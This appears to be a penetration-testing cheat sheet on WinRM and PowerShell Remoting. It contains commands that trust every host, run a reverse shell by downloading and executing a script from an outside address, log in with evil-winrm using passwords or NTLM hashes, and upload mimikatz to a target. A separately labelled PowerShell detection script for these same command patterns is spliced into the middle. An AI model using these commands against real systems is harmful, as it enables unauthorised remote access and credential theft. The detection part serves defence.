We first have to configure our attack machine to work with WinRM as well. We need to enable it and add any "victims" as trusted hosts. From an elevated PowerShell prompt, run the following two commands:
# Target Windows Terminal
PS> Enable-PSRemoting -Force
PS> Set-Item wsman:\localhost\client\trustedhosts *
Execute Commands via PS Remoting
# Target Windows Terminal
# Run a reverse shell
PS> Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/shell.ps1')"}
# Run a command
PS> Invoke-Command -computername <computername> -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
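The command shapes above (the TrustedHosts wildcard, remote Invoke-Command, and the download cradle) are what PowerShell script block logging (event ID 4104) records. The following is an added detection example, not part of the original page: the function name, rule names, severity threshold, and sample lines are constructed for illustration.

```powershell
# Added example: flag script-block text that matches the WinRM / PS Remoting
# command shapes shown on this page. Rule names and severity are assumptions.
$Rules = [ordered]@{
    'TrustedHosts wildcard'   = 'Set-Item\s+wsman:\\localhost\\client\\trustedhosts\s+(-Value\s+)?[''"]?\*'
    'Remote Invoke-Command'   = 'Invoke-Command\b.*-ComputerName\b'
    'Download cradle'         = '\biex\b.*DownloadString\(|DownloadString\(.*\|\s*iex\b'
    'Execution policy bypass' = '-(ep|ExecutionPolicy)\s+bypass\b'
}

function Find-RemotingIndicator {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$ScriptBlockText)
    process {
        # -match is case-insensitive, so "-computername" and "-ComputerName" both hit
        $hits = @(foreach ($name in $Rules.Keys) {
            if ($ScriptBlockText -match $Rules[$name]) { $name }
        })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                # Three or more rules on one line = remote execution plus staged download
                Severity = if ($hits.Count -ge 3) { 'High' } else { 'Medium' }
                Rules    = $hits -join ', '
                Text     = $ScriptBlockText
            }
        }
    }
}

# Constructed sample script-block text (hostnames and the 192.0.2.10 address are placeholders)
$Samples = @(
    'Set-Item wsman:\localhost\client\trustedhosts *'
    'Invoke-Command -ComputerName SRV01 -ScriptBlock {ipconfig /all}'
    'Invoke-Command -ComputerName SRV01 -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString(''http://192.0.2.10:8080/a.ps1'')"}'
    'Get-ChildItem C:\Temp'
)
$Samples | Find-RemotingIndicator | Format-List

# Live use (requires script block logging to be enabled on the host):
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} |
#     ForEach-Object { $_.Properties[2].Value } | Find-RemotingIndicator
```

The first two samples are reported as Medium, the third as High, and the `Get-ChildItem` line produces no output.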
Using Evil-WinRm
# Install
gem install evil-winrm
# Remote access
evil-winrm -u Administrator -p '<Password>' -i <IP>
evil-winrm -u <username> -H <Hash> -i <IP>
# File transfer
download    # download to your kali
# download C:\temp\supersecret.txt /opt/Juggernaut/JUGG-Backup/supersecret.txt
upload      # upload to a target machine
# upload /opt/Windows/exploits/executables/mimikatz.exe C:\temp\mimikatz.exe